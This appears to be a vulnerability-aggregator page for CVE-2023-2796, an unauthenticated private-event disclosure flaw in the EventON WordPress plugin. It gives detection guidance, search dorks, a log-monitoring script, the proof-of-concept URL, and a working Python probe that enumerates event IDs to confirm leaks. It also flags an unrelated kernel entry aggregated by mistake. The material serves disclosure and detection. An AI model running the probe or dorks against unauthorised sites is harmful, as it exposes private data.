CVE-2023-2796
Published 2023-07-10
Priority P1 81 · medium 5.3 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Exploited in the wild (ITW exploit; VulnCheck KEV)
EPSS: 37.47% (98.3rd percentile)
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| myeventon | eventon | < 2.1.2 | 2.1.2 |
Detection & IOCs (extracted from sources)
Indicator: BEGIN:VCALENDAR / END:VCALENDAR in the response body
- Detect unauthenticated GET requests to the eventon_ics_download AJAX action. A successful exploit returns HTTP 200 with a valid iCalendar body (BEGIN:VCALENDAR ... END:VCALENDAR) and a Content-Type: text/Calendar header.
- Monitor web server logs for requests to /wp-admin/admin-ajax.php with the query parameter action=eventon_ics_download, especially with sequential numeric event_id values (enumeration/IDOR pattern). Caveat: the default combined log format records no cookies, so a log line alone cannot show whether the caller held a WordPress session; treat every such request as worth review unless your log format captures the wordpress_logged_in_ cookie.
- Shodan dorks to identify exposed instances: vuln:CVE-2023-2796, http.html:/wp-content/plugins/eventon-lite/, or http.html:/wp-content/plugins/eventon/
- Google dork to find exposed EventON installations: inurl:"/wp-content/plugins/eventon/"
- Note: this vulnerability affects EventON Free before 2.1.2. A separate issue, CVE-2024-0235, affects Free before 2.2.8 and Premium before 4.5.5. The Exploit-DB PoC was tested against version 4.4 (Premium), so version checks should cover both the Free and Premium branches.
- Note: the Nuclei template for CVE-2023-2796 uses event_id=1 as a fixed probe value; in real enumeration attackers iterate numeric IDs. Detection rules should account for sequential or varied event_id values, not just id=1.
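The two log-monitoring points above, as an added example that is not part of this page or of any vendor tooling: a Python script that parses constructed combined-format access-log lines (the IPs, timestamps and sizes are invented), isolates requests to admin-ajax.php carrying action=eventon_ics_download, and flags source IPs that walked consecutive event_id values. Because combined logs carry no cookies, the script cannot tell a logged-in user from an anonymous one; it assumes every hit is worth reviewing and lets the enumeration pattern do the prioritising.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache/nginx "combined" format; the IPs are
# documentation ranges and the traffic is invented for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1 HTTP/1.1" 200 812 "-" "python-requests/2.31"
203.0.113.7 - - [22/Jan/2024:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=2 HTTP/1.1" 200 790 "-" "python-requests/2.31"
203.0.113.7 - - [22/Jan/2024:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=3 HTTP/1.1" 200 1 "-" "python-requests/2.31"
203.0.113.7 - - [22/Jan/2024:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=4 HTTP/1.1" 200 801 "-" "python-requests/2.31"
198.51.100.4 - - [22/Jan/2024:10:05:00 +0000] "GET /blog/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=17 HTTP/1.1" 200 802 "https://example.com/blog/events/" "Mozilla/5.0"
192.0.2.9 - - [22/Jan/2024:10:06:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["path"])
    qs = parse_qs(url.query)
    rec["script"] = url.path
    rec["action"] = qs.get("action", [None])[0]
    eid = qs.get("event_id", [None])[0]
    rec["event_id"] = int(eid) if eid is not None and eid.isdigit() else None
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def is_ics_download(rec):
    """True for any request to admin-ajax.php carrying action=eventon_ics_download.
    endswith() keeps subdirectory installs (/blog/wp-admin/...) in scope."""
    return (rec is not None
            and rec["script"].endswith("/wp-admin/admin-ajax.php")
            and rec["action"] == "eventon_ics_download")


def ics_hits(log_text):
    """Every eventon_ics_download request as (ip, event_id, status, size).
    Combined logs carry no cookies, so authentication state is unknown here
    (assumption: treat every hit as worth reviewing; a 200 with a calendar-sized
    body, roughly 800 bytes in this sample, is the strongest per-line signal)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_ics_download(rec):
            hits.append((rec["ip"], rec["event_id"], rec["status"], rec["size"]))
    return hits


def find_enumeration(log_text, min_ids=3):
    """Flag source IPs that requested at least min_ids distinct event_id values
    including at least one pair of consecutive IDs (the IDOR walk pattern).
    Returns {ip: sorted event_ids}."""
    per_ip = defaultdict(set)
    for ip, eid, _status, _size in ics_hits(log_text):
        if eid is not None:
            per_ip[ip].add(eid)
    flagged = {}
    for ip, ids in per_ip.items():
        ordered = sorted(ids)
        if len(ordered) >= min_ids and any(b - a == 1 for a, b in zip(ordered, ordered[1:])):
            flagged[ip] = ordered
    return flagged


if __name__ == "__main__":
    for ip, ids in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip} walked event_id {ids[0]}..{ids[-1]} ({len(ids)} ids)")
```

The single hit from 198.51.100.4 with a site referrer is what a legitimate "add to calendar" click looks like and is not flagged; the cookie-less, referrer-less walk from 203.0.113.7 is. Tune min_ids to your site's event volume before alerting on it.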
CVSS provenance
- nvd (v3.1): 5.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- vulncheck: 5.3 MEDIUM
- vendor_redhat: 5.5 MEDIUM (this score belongs to CVE-2023-53294, the unrelated Linux kernel entry aggregated further down, not to CVE-2023-2796)
GHSA
GHSA-v77x-qc2p-7878 (ghsa_unreviewed · 2023-07-10 · CVE-2023-2796 · MEDIUM · CWE-862)
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
VulnCheck
myeventon eventon Missing Authorization (vulncheck · 2023 · CVE-2023-2796 · MEDIUM · CVSS 5.3)
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
Affected: myeventon eventon
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2023-2796
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnerability=cve-2023-2796
- https://dashboard.shadowserver.org/statistics/hon
Red Hat
kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup() (vendor_redhat · 2025-09-16 · CVE-2023-53294 · MEDIUM · CVSS 5.5)
This entry is unrelated to CVE-2023-2796: it describes a Linux kernel ntfs3 bug, CVE-2023-53294, and appears to have been pulled in by the string "fs/dcache.c:2796" in its stack trace.
In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
Syzbot reported a null-ptr-deref bug:
ntfs3: loop0: Different NTFS' sector size (1024) and media sector size (512)
ntfs3: loop0: Mark volume as dirty due to NTFS errors
general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
RIP: 0010:d_flags_for_inode fs/dcache.c:1980 [inline]
RIP: 0010:__d_add+0x5ce/0x800 fs/dcache.c:2796
Call Trace:
d_splice_alias+0x122/0x3b0 fs/dcache.c:3191
lookup_open fs/namei.c:3391 [inline]
open_last_lookups fs/namei.c:3481 [inline]
path_openat+0x
No detection rules found.
Exploit-DB
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access (exploitdb · 2023-08-04 · CVE-2023-2796 · MEDIUM · CVSS 5.3)
---
# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-2796
# 1. Description
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
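A verification script for the PoC URL above, added here as an example; it is neither the Exploit-DB author's code nor the vendor's. It builds the admin-ajax.php request for a list of event IDs, sends each with no WordPress session cookie, and reports an ID as exposed only when the response matches the indicators listed in the detection section (HTTP 200, a text/calendar Content-Type, a complete BEGIN:VCALENDAR ... END:VCALENDAR envelope), then pulls the SUMMARY lines so you can confirm that a private event actually leaked rather than a public one. The fetch function is injectable: fake_fetch is a constructed stand-in for a vulnerable site so the block runs offline, and what it returns for an unknown ID is an assumption, not observed plugin behaviour.

```python
import re
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List
from urllib.parse import parse_qs, urlencode, urlparse

AJAX_PATH = "/wp-admin/admin-ajax.php"


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: str


def build_probe_url(base_url: str, event_id: int) -> str:
    """The PoC URL from the advisory, with event_id filled in."""
    query = urlencode({"action": "eventon_ics_download", "event_id": event_id})
    return base_url.rstrip("/") + AJAX_PATH + "?" + query


def looks_like_ics(resp: Response) -> bool:
    """The response-side indicators from this page: 200, a text/calendar
    Content-Type (the plugin sends it as text/Calendar, hence the case-insensitive
    compare) and a complete VCALENDAR envelope. All three must hold."""
    ctype = next((v for k, v in resp.headers.items() if k.lower() == "content-type"), "")
    return (resp.status == 200
            and ctype.lower().startswith("text/calendar")
            and "BEGIN:VCALENDAR" in resp.body
            and "END:VCALENDAR" in resp.body)


def ics_summaries(body: str) -> List[str]:
    """SUMMARY values from an iCalendar body, after undoing RFC 5545 line folding
    (a line break followed by one space or tab continues the previous line)."""
    unfolded = re.sub(r"\r?\n[ \t]", "", body)
    return [line[len("SUMMARY:"):] for line in unfolded.splitlines() if line.startswith("SUMMARY:")]


def urllib_fetch(url: str) -> Response:
    """Plain GET with no cookies, so the request is unauthenticated by construction."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-2796-check"})
    with urllib.request.urlopen(req, timeout=10) as r:
        return Response(r.status, dict(r.headers.items()), r.read().decode("utf-8", "replace"))


def probe(base_url: str, event_ids: Iterable[int],
          fetch: Callable[[str], Response] = urllib_fetch) -> Dict[int, List[str]]:
    """Return {event_id: [summaries]} for every ID that yielded an iCalendar export."""
    exposed = {}
    for eid in event_ids:
        resp = fetch(build_probe_url(base_url, eid))
        if looks_like_ics(resp):
            exposed[eid] = ics_summaries(resp.body)
    return exposed


# Constructed stand-in for a vulnerable site so the block runs offline.
# Assumption: IDs 1 and 3 are private events. What the real plugin returns for an
# unknown ID is not documented on this page; "0" (WordPress's generic admin-ajax
# reply) is a placeholder, not observed behaviour. The SUMMARY line is folded to
# exercise the unfolding logic.
FAKE_ICS = ("BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
            "UID:{eid}@example.com\r\nSUMMARY:Board meeting, Q1 budget\r\n  (private)\r\n"
            "END:VEVENT\r\nEND:VCALENDAR\r\n")


def fake_fetch(url: str) -> Response:
    eid = parse_qs(urlparse(url).query).get("event_id", [""])[0]
    if eid in ("1", "3"):
        return Response(200, {"Content-Type": "text/Calendar; charset=utf-8"}, FAKE_ICS.format(eid=eid))
    return Response(200, {"Content-Type": "text/html; charset=UTF-8"}, "0")


if __name__ == "__main__":
    # Against a live target you would pass fetch=urllib_fetch (the default) and
    # only IDs you are authorised to test.
    print(probe("https://example.com", range(1, 6), fetch=fake_fetch))
```

The three-way match in looks_like_ics matters: a site that serves a custom HTML error page with a 200 status, or an export endpoint that returns a calendar for public events, should not be counted as a finding without the private-event confirmation that the SUMMARY check supports.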
Nuclei
EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure (nuclei · CVE-2024-0235 · MEDIUM · CVSS 5.3)
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
Template:
id: CVE-2024-0235
info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress
Nuclei
EventON <= 2.1 - Missing Authorization (nuclei · CVE-2023-2796 · MEDIUM · CVSS 5.3)
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
Template:
id: CVE-2023-2796
info:
  name: EventON <= 2.1 - Missing Authorization
  author: randomrobbie
  severity: medium
  description: |
    The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
  impact: |
    Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events.
  remediation: Fixed in v
References
- http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
- https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d